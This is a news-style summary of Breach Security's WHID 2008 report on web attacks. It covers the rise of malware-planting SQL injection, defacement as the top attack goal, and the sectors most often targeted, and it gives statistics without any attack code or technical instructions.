Breach Security announced that web attackers unleashed a new type of SQL injection attack in 2008 that successfully compromised more than 500,000 web sites, according to its Web Hacking Incidents Database (WHID) 2008 Annual Report. Marking a major event for the web application security landscape, the report found that SQL injection attacks planting malware on target web sites was the number one security attack for online criminals last year.
Breach’s WHID report also noted a shift in attack methodology in which hackers focused more on a web site’s large customer base in 2008, instead of targeting sensitive information within the web site’s database. This attack method turns a web site into a malware launching point when legitimate users visit the site. The report highlights one important factor — the unknown. Twenty-nine percent of the incidents were reported without specifying the attack method. This lack of attack vector confirmation may be attributed to a combination of two main factors: lack of visibility of web traffic and resistance to public disclosure.
The 2008 WHID report identified multiple hacking-for-profit mechanisms. In fact, 19 percent of attacks were aimed at stealing personal information. Traded easily on the Internet, personal records are the easiest virtual commodity to exchange for money. In addition, the report found that criminals also exploited web sites for financial gain via planting malware and phishing, which comprised 16 percent and 5 percent of attacks in 2008, respectively.
Breach’s WHID report found that financial gain is not the only motivation for online attacks. The number one attack goal in 2008 was web site defacement. Used primarily to target political parties, candidates and government departments, ideologists often defaced a web site with a very specific message related to a campaign.
Corresponding with the ideology driven defacement noted in 2008, the WHID report also found that “Government, Security and Law Enforcement,” at 32 percent, was the top vertical market targeted by attackers. Internet-related organizations topped the list on the commercial side, including retail shops comprising mostly e-commerce sites, media companies and pure internet services such as search engines and service providers. In addition, financial institutions rose sharply in 2008 moving up to fourth place.